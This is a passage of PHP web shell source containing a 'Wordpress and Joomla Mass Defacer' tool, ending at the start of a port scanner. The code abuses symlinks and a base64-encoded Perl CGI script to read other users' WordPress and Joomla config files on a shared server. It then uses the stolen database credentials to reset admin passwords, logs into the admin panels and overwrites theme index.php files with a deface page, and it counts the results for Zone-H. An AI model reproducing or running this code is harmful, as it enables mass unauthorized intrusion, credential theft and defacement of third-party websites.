  2410.     {error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() % 33;$tmp = substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function index_changer_wp($conf, $content) {$output = '';$dol = '$';$go = 0;$username = entre2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PASSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix = entre2v2($conf,$dol."table_prefix  = '","'");$host = entre2v2($conf,"define('DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");} else {$output.= "[-] DB Error<br />";}if($req1) {$req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"]; $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='template'");$data = mysql_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_fetch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, 
CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";$go = 1;}if($go) {$cond = 0;$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Updated Successfuly<br />";$hk = explode('public_html',$_file);$output.= '[+] Deface 
'.file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond = 1;}} else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template Updated Successfuly<br />";$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}} else {$output.= "[-] index.php can not load in Theme Editor<br />";}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.'COOKIE.txt');return array('cond'=>$cond, 'output'=>$output);}function index_changer_joomla($conf, $content, $domain) {$doler = '$';$username = entre2v2($conf, $doler."user = '", 
"';");$password = entre2v2($conf, $doler."password = '", "';");$dbname = entre2v2($conf, $doler."db = '", "';");$prefix = entre2v2($conf, $doler."dbprefix = '", "';");$host = entre2v2($conf, $doler."host = '","';");$co=randomt();$site_url = "http://".$domain."/administrator";$output = '';$cond = 0; $link=mysql_connect($host, $username, $password);if($link) {mysql_select_db($dbname,$link) ;$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));} else {$output.= "[-] DB Error<br />";}if($req1){if ($req) {$req = mysql_query("SELECT * from  `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");$data = mysql_fetch_array($req);$template_name = $data["template"];$req = mysql_query("SELECT * from  `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");$data = mysql_fetch_array($req);$template_id = $data["extension_id"];$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);if($return && $hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_REFERER, $url2);curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 
0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos){$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);if($hidden2) {$output.= "[+] index.php file found in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}} else {$req =mysql_query("SELECT * from  `".$prefix."templates_menu` WHERE client_id='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];$useragent="Mozilla/4.0 
(compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);if($hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos) {$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);if($hidden2) {$output.= "[+] index.php file founded in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, 
CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co);$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message fade">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.$co);return array('cond'=>$cond, 'output'=>$output); }function exec_mode_1($def_url) {@mkdir('sym',0777);$wr  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp, $wr);@symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Total domains: $numero_dominios <br><br />";$def = file_get_contents($def_url);$def = urlencode($def);$dd = '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';$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html', 'a+');$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? 
$_SESSION['count2'] :0 ) : 0;echo '<table style="width:75%;" align="center"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;for($i = $st; $i <= $numero_dominios; $i++){$domain = $out[1][$i];$dono_arquivo = @fileowner("/etc/valiases/".$domain);$infos = @posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count1'] = $_SESSION['count1'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span 
class="red">FAILED</span></td>';}echo '</tr>';}$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config03 && preg_match('/DB_NAME/i',$config03)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config03, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($_SESSION['count1']+$_SESSION['count2'] > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
  2411.   NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
  2412.   h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
  2413.   G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
  2414.   YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
  2415.   kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
  2416.   B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr  = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 
'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' 
(JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def);  $output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
  2417.   kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
  2418.   VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
  2419.   3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
  2420.   cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
  2421.   MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
  2422.   R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/data.txt', $_POST['man_data']);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr  = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 
'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' 
(JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}echo '<!DOCTYPE html><html><head><link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css"><style type="text/css">.header {position:fixed;width:100%;top:0;background:#000;}.footer {position:fixed;width:100%;bottom:0;background:#000;}input[type="radio"]{margin-top: 0;}.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}.even {background-color: rgba(25, 25, 25, 0.6);}.odd {background-color: rgba(102, 102, 102, 0.6);}textarea{background: rgba(0,0,0,0.6); color: white;}.green {color:#00FF00;font-weight:bold;}.red {color:#FF0000;font-weight:bold;}</style><script type="text/javascript">function change() {if(document.getElementById(\'rcd\').checked == true) {document.getElementById(\'tra\').style.display = \'\';} else {document.getElementById(\'tra\').style.display = \'none\';}}function hide() {document.getElementById(\'tra\').style.display = \'none\';}</script></head><body><h2 style="font-size:25px;color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '<form action="" method="post"><table align=center><tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" id="rcd" 
onclick="change();"></td><td>manual copy of /etc/passwd</td></tr><tr id="tra" style="display: none;"><td></td><td><textarea cols="60" rows="10" name="man_data"></textarea></td></tr></table><br><input type="hidden" name="form_action" value="1"><table align=center><tr><td><b>index url: </b><input class="inputz" size="45" type="text" name="defpage" value=""></tr></td></table><center><input class="inputzbut" type="submit" value="Attack !" name="Submit"></center></form>';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }}if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }echo '</body></html>';
  2423.    }
  2424. }  elseif($_GET['do'] == 'ports') {
  2425.     echo '<table><tr><th><center><u>Port Scanner</u></tr></th></center><td>';
  2426.     echo '<div class="content">';
  2427.     echo '<form action="" method="post">';
  2428.    
  2429.     if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
